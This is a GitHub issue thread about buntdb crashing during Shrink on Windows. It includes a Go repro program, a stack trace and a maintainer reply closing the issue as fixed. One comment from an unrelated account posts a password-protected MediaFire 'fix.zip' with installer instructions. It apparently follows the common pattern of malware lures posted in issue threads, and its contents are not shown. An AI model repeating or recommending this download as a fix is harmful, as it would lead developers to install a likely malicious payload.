### ISSUE TITLE
[BUG] Shrink crash on windows

### ISSUE THREAD

**Issue by idosavion** [tidwall/buntdb#119]
I recently encountered a bug where `buntdb` would crush during shrinking on windows both with latest and `1.2.10`, (managed to reproduce consistently, ran on Mac successfully), using the following program:
```
package main

import (
	"fmt"
	"log"
	"strconv"
	"time"

	"github.com/tidwall/buntdb"
)

func main() {
	db, err := buntdb.Open("data.db")
	if err != nil {
		log.Fatal(err)
	}
	defer db.Close()

	err = db.Update(func(tx *buntdb.Tx) error {
		for i := 0; i < 100000; i++ {
			key := "key" + strconv.Itoa(i)
			value := "value" + strconv.Itoa(i)
			err := tx.Set(key, value, nil)
			if err != nil {
				return err
			}
		}
		return nil
	})

	if err != nil {
		log.Fatal(err)
	}}
```

and encountered the following stack trace:
```
goroutine 114 [running]:
github.com/tidwall/buntdb.panicErr(...)
/Users/runner/go/pkg/mod/github.com/tidwall/buntdb@v1.2.10/buntdb.go:771
github.com/tidwall/buntdb.(*DB).Shrink.func4(.., {.., 0x4f}, ..?, ., {0xc.., 0x53})
/Users/runner/go/pkg/mod/github.com/tidwall/buntdb@v1.2.10/buntdb.go:755 +0x565
github.com/tidwall/buntdb.(*DB).Shrink(0xc..)
/Users/runner/go/pkg/mod/github.com/tidwall/buntdb@v1.2.10/buntdb.go:767 +0x330
github.com/tidwall/buntdb.(*DB).backgroundManager(0x..0)
/Users/runner/go/pkg/mod/github.com/tidwall/buntdb@v1.2.10/buntdb.go:622 +0x21d
created by github.com/tidwall/buntdb.Open in goroutine 108
/Users/runner/go/pkg/mod/github.com/tidwall/buntdb@v1.2.10/buntdb.go:170 +0x3f9	{"pid": 19376}
```

(basically, moving the file on windows returned `panic: buntdb: rename mydb.db.tmp mydb.db: Access is denied` and the original file still exists)

Is there any workaround I should apply in such cases? Should I manage shrinking ourselves?
Thank!

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tidwall** [comment]
Closing. I think this was fixed by #120
